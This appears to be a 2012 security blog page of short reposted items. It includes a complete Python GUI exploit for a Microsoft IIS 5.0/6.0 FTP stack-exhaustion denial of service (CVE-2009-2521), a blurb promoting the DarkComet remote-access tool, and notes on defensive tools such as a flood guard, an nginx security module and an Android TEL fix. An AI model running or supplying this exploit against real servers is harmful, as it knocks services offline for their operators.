Oct 6, 2012

List Of Input Validation and Representation

Input Validation and Representation

Input validation and representation problems ares caused by metacharacters, alternate encodings and numeric representations. Security problems result from trusting input. The issues include: "Buffer Overflows," "Cross-Site Scripting" attacks, "SQL Injection," and many others.

Source: http://www.hpenterprisesecurity.com/vulncat/en/vulncat/IPV.html

If you like my blog, Please Donate Me

Oct 3, 2012

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION]

#!/usr/bin/python
# Exploit Title: Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION]
# Exploit Author: D35m0nd142 
# Date: 03/10/2012
# Vendor Homepage: http://www.iis.net/
# Tested on Ubuntu 12.04
# CVE: 2009-2521
# Special thanks to Kingcope 

from socket import *
import sys
import Tkinter 
import time

def exploit():
 sock=socket(AF_INET,SOCK_STREAM)
 ip1=ip.get()
 port1=port.get()
 username="ftp"
 passwd="[email protected]"
 sock.connect((ip1,port1))
 sock.send("user %s\r\n" %username)
 print "[+]" + sock.recv(1024)
 sock.send("pass %s\r\n" %passwd)
 print "[+]" + sock.recv(1024)
 command="ls -R P*/../"
 sock.send("%s\r\n" %command)
 print sock.recv(1024)
 sock.close()
 time.sleep(2)
 exploited=Tkinter.Label(text="[+] Exploit sent [+]",bg="blue",fg="green").pack()  

root=Tkinter.Tk()
root.title("* Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service *")
root['bg']="black"
ip_text=Tkinter.Label(text="IP Address :").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
port_text=Tkinter.Label(text="Port :").pack()
port=Tkinter.IntVar()
port_entry=Tkinter.Entry(textvariable=port).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
author=Tkinter.Label(text="Author: D35m0nd142 | https://twitter.com/D35m0nd142").pack(side='bottom')
root.mainloop()


# 1337day.com [2012-10-03]
 
Source: http://1337day.com/exploits/19503 


If you like my blog, Please Donate Me

WordPress Version Checker - MD5 Hash Method

WordPress Version Check provides you with an easy way of checking that which version your Victim is using. It is a simple php Script based upon  MD5 Hash Method.

Source: http://toolsyard.thehackernews.com/2012/10/wordpress-version-checker-md5-hash.html

If you like my blog, Please Donate Me

DarkComet RAT Legacy v5.4.1

DarkComet-RAT is back but it is now entirely legal. The coder decided to remove those functions that were considered ‘ambigious’ at best and somewhat illegal at worst. Removed from DarkComet-RAT is the ability to configure a stub to target a computer and let the stub install automatically/silently and being fully hidden on the system.

Almost all functions from the previous version (v5.3.1) remain, except those functions that are now useless or those that can be used for undesirable actions, like stealthily visiting a website of DDOS for stress testing.

Both the Edit Server and Downloader Editor were also entirely removed since the stub is now graphically configured to the computer you want to control.
 


If you like my blog, Please Donate Me

IOSEC - Detect Flooder IPs, Reduce Attack Surface against HTTP Flood Attacks

This is a unique project and it is the world's first web application flood guard script.
At web application (scripting) level you can,
- Block proxies. (only via HTTP header)
- Detect flooding IP addresses.
- Slow down or restrict access for automated tools (HTTP flood, brute force tools, vulnerability scanners, etc.)
- Save your server resources (database, cpu, ram, etc.) under an attack.
- Restrict access permanently or temporarily for listed IP addresses in "banlist" file.
- Notify yourself via email alerts when attacks begin.
- Implicit deny for DDoS attacks
 


If you like my blog, Please Donate Me

Oct 2, 2012

เปรียบเทียบ Firewall x IDS_IPS x NGFW x WAF

บทความนี้แต่งขึ้นมาเพื่ออธิบายหลักการใช้งานของ Firewall, IDS/IPS, Next Generation Firewall, Web Application Firewall ครับ

Dowload Link: http://www.4shared.com/office/f2y60TP9/Firewall_X_IDS_IPS_X_NGFW_X_WA.html

หากใครขี้เกียจอ่านทั้งหมดทั้งบทความผมสรุปเป็นคำพูดแบบนี้ละกันครับ


"หากเปรียบเทียบง่ายๆว่า Server เป็นบ้าน Firewall ก็คงเป็นประตูรั้วของบ้านที่ควบคุมการเข้าถึงตัวบ้านได้ ส่วน IDS ก็คือกล้องวงจรปิดที่ไม่มีคนเฝ้าเพราะได้แต่แจ้งว่ามีผู้บุกรุก แต่ถ้าหากเป็น IPS ก็คือกล้องวงจรปิดที่มีคนคอยเฝ้าอยู่ตลอดเวลา เมื่อพบผู้บุกรุกก็สามารถแจ้งหรือป้องกันไม่ให้ผู้บุกรุกเข้ามายังภายในตัวบ้านได้ ถ้าพูดถึง NGFW คงเป็นพี่เลี้ยงเด็กที่คอยควบคุมเด็กภายในบ้านว่าไม่ให้ทำอะไรที่ดูอันตรายหรือทำอะไรเกินสิ่งที่ควรจะทำ รวมถึงป้องกันไม่ให้ใครที่เข้ามาแล้ว พยายามทำอันตรายเด็กๆภายในบ้านนั้นอีกด้วย และถ้าหากพูดถึง WAF ก็คงเป็นผู้ที่คอยยืนเฝ้าและตรวจตาผู้ที่เข้าประตูห้องที่เก็บตู้เซ็ฟ(ซึ่งในที่นี้อาจจะหมายถึงดาต้าเบสเซอร์เวอร์ก็เป็นได้)อย่างเข้มงวดเผื่อผู้ที่เข้าไปนั้นจะพกอะไรที่เป็นอันตรายเข้าไปห้องจะได้กันไม่ให้เข้าไปได้ทันท่วงทีนั่นเอง"


If you like my blog, Please Donate Me

nginx-perl-security - Perl module for protect nginx server

This perl-module provides protection against XSS, SQL-injection and other security problems.  

How to install
1. extract .tar.gz to /etc/nginx
2. Add config to /etc/nginx/nginx.conf

http {
  ...
  perl_modules /etc/nginx/nginx-perl-security/;
  perl_require security.pm;
  ...
}
 
Source: http://code.google.com/p/nginx-perl-security/wiki/Install 

If you like my blog, Please Donate Me

Oct 1, 2012

Cookie Carger - An auditing tool for Wi-Fi or wired Ethernet connections

Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests.
Web providers have started stepping up to the plate since Firesheep was released in 2010. Today, most major websites can provide SSL/TLS during all transactions, preventing cookie data from leaking over wired Ethernet or insecure Wi-Fi. But the fact remains that Firesheep was more of a toy than a tool. Cookie Cadger is the first open-source pen-testing tool ever made for intercepting and replaying specific insecure HTTP GET requests into a browser.


Source: https://www.cookiecadger.com/

If you like my blog, Please Donate Me

TelStop - Stop "Tel Vulnerability" of Android.

This is a quick fix for the TEL attacks described here [2].
TelStop publishes a TEL handler and will be invoked on every phone call the originates from a TEL URL. TelStop will only show itself if it sees a problem with the URL. You will only see the WARNING screen if the URL looks fishy.

Source: https://play.google.com/store/apps/details?id=org.mulliner.telstop


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |